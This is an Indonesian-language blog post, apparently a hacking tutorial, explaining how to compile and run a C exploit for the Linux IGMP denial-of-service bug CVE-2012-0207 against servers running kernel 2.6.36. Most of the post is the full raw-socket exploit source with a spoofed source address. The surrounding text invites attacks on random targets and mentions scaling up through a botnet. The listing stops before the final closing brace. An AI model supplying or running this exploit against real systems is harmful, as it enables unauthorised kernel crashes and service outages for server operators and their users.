Denial Of Service [DoS] Linux Kernel 2.6.36

Kali ini saya akan berbagi mengenai bagaimana cara DoS menggunakan tools berikut terhadap linux server. DOS kali ini akan menggunakan kelemahan pada bugs IGMP.


Oke yang perlu dipersiapkan adalah:
  1. Siapkan server / pc untuk mengcompile source ddos.
  2. Siapkan pc target linux, bisa random / yang memiliki kernel 2.6.36
  3. Memulai attack :)
Cara menjalankannya adalah
  1. Simpan code dibawah ini dengan nama file: dos-linux.c
  2. Compile source dibawah menggunakan gcc: gcc dos-linux.c -o attacklinux
Kemudian setelah selesai jalankan dengan perintah: ./attacklinux source_ip destination_ip , misal:./attacklinux 127.0.0.1 10.10.10.10
DoS dengan IGMP ini juga bisa dilakukan di DDOS, apabila kalian memiliki BOTNET :)
Selamat mencoba semoga berhasil..

Berikut adalah code DoS tools:
  1. /*
  2. ** linux-undeadattack.c
  3. ** Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)
  4. ** CVE-2012-0207
  5. ** credits to Ben Hutchings:
  6. ** http://womble.decadent.org.uk/blog/igmp-denial-of-service-in-linux-cve-2012-0207.html
  7. ** THIS code wich can attack NOT just LAN, is NOT kcopes and, is based more on the ICMPv3 membership query bug... wich was for windows but also affects linux, in IMPv3 tho <img src="http://crazycoders.com/wp-includes/images/smilies/icon_razz.gif" alt=":P" class="wp-smiley">  go figure... anyhow, this can now be easily made into a very fast packet machine ,and since it doesnt care what the ips are, i guess could be seen results, remotely... feel free to update/send in comment... all comments, go thru ME, XD , before any type of publishing, so be sure that codes are safe and, i only put here, corrected codes...simple... so, please dont go adding it to your lame d0s collection coz, ill just fark it up , and, i mean, the packet is easy to block since it is released...right
  8. XD loves u all
  9. ** Example:
  10. ** ./undeadattack SRC_IP DST_IP
  11. ** The Linux Kernel at the remote side will Panic
  12. ** when sent over the network -still in testing!
  13. */
  14. #include <stdio.h>
  15. #include <string.h>
  16. #include <stdlib.h>
  17. #include <netinet/in.h>
  18. #include <netdb.h>
  19. #include <sys/time.h>
  20. #include <sys/types.h>
  21. #include <sys/socket.h>
  22. #include <arpa/inet.h>
  23. #include <unistd.h>
  24. struct iphdr {
  25.   unsigned char ihl:4, version:4, tos;
  26.   unsigned short tot_len, id, frag_off;
  27.   unsigned char ttl, protocol;
  28.   unsigned short check;
  29.   unsigned int saddr, daddr;
  30.   unsigned int options1;
  31.   unsigned int options2;
  32. };
  33. struct igmp_query {
  34.         unsigned char type;
  35.         unsigned char maxresponse;
  36.         unsigned short csum;
  37.         unsigned int mcast;
  38.         char padding[40];
  39. };
  40. // unsigned short in_chksum(unsigned short *, int);  // removed by xd , thx for trying to cripple but no work
  41. unsigned short in_chksum(unsigned short *addr, int len);         // this was crippled, notice that this was uptop, so you dd not see the
  42.                                                                  // bugged up in_chksum wich wont make this works <img src="http://crazycoders.com/wp-includes/images/smilies/icon_smile.gif" alt=":)" class="wp-smiley">  NOW try it.
  43. unsigned short in_chksum(unsigned short *addr, int len) {
  44.    register int nleft = len;
  45.    register int sum = 0;
  46.    u_short answer = 0;
  47.    while (nleft > 1) {
  48.       sum += *addr++;
  49.       nleft -= 2;
  50.    }
  51.    if (nleft == 1) {
  52.       *(u_char *)(&answer) = *(u_char *)addr;
  53.       sum += answer;
  54.    }
  55.    sum = (sum >> 16) + (sum & 0xffff);
  56.    sum += (sum >> 16);
  57.    answer = ~sum;
  58.    return(answer);
  59. }
  60. long resolve(char *);
  61. long resolve(char *host) {
  62.   struct hostent *hst;
  63.   long addr;
  64.   hst = gethostbyname(host);
  65.   if (hst == NULL)
  66.     return(-1);
  67.   memcpy(&addr, hst->h_addr, hst->h_length);
  68.   return(addr);
  69. }
  70. int main(int argc, char *argv[]) {
  71.   struct sockaddr_in dst;
  72.   struct iphdr *ip;
  73.   struct igmp_query *igmp;
  74.   long daddr, saddr;
  75.   int s, i=0, c, len, one=1;
  76.   char buf[1500];
  77.   if (argc < 3) {
  78.     printf("Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)\n"
  79.    "credits to Ben Hutchings but this is NOT kcopes code nor firestorms so, author stays anon\n");
  80.     printf("Usage: %s <src ip> <dst ip>\n", *argv); // yea, try any ip and see, i guess its worth a shot... or not <img src="http://crazycoders.com/wp-includes/images/smilies/icon_razz.gif" alt=":P" class="wp-smiley">
  81.     return(1);
  82.   }
  83.   daddr = resolve(argv[2]);
  84.   saddr = resolve(argv[1]);
  85.   memset(buf, 0, 1500);
  86.   ip = (struct iphdr *)&buf;
  87.   igmp = (struct igmp_query*)&buf[sizeof(struct iphdr)];
  88.   dst.sin_addr.s_addr = daddr;
  89.   dst.sin_family = AF_INET;
  90.   ip->ihl = 7;
  91.   ip->version = 4;
  92.   ip->tos = 0;
  93.   ip->tot_len = htons(sizeof(struct iphdr)+8);
  94.   ip->id = htons(18277);
  95.   ip->frag_off=0;
  96.   ip->ttl = 1;
  97.   ip->protocol = IPPROTO_IGMP;
  98.   ip->check = in_chksum((unsigned short *)ip, sizeof(struct iphdr));
  99.   ip->saddr = saddr;
  100.   ip->daddr = daddr;
  101.   ip->options1 = 0;
  102.   ip->options2 = 0;
  103.   igmp->type = 0x11;
  104.   igmp->maxresponse = 0xff;
  105.   igmp->mcast=inet_addr("0.0.0.0");  // mod here ,now we can attack the IP we actually put in
  106.   igmp->csum = 0; //For computing the checksum, the Checksum field is set to zero.
  107.   igmp->csum=in_chksum((unsigned short *)igmp, 8);
  108.   s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  109.   if (s == -1)
  110.     return(1);
  111.   printf("Sending IGMP packet: %s -> %s\n", argv[1], argv[2]);
  112.       if (sendto(s,&buf,sizeof(struct iphdr)+8,0,(struct sockaddr *)&dst,sizeof(struct sockaddr_in)) == -1) {
  113.         perror("Error sending packet");
  114.         exit(-1);
  115.       }
  116.   close(s);
  117.   s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  118.   if (s == -1)
  119.     return(1);
  120.   ip->id = htons(18278);
  121.   ip->tot_len = sizeof(struct iphdr)+12;
  122.   igmp->type = 0x11;
  123.   igmp->maxresponse = 0;
  124.   igmp->mcast=inet_addr("0.0.0.0");
  125.   igmp->csum = 0; //For computing the checksum, the Checksum field is set to zero.
  126.   igmp->csum=in_chksum((unsigned short *)igmp, 12);
  127.   printf("Sending packet: %s -> %s\n", argv[1], argv[2]);
  128.       if (sendto(s,&buf,sizeof(struct iphdr)+12,0,(struct sockaddr *)&dst,sizeof(struct sockaddr_in)) == -1) {
  129.         perror("Error sending packet");
  130.         exit(-1);
  131.       }
  132.   return(0);


Komentar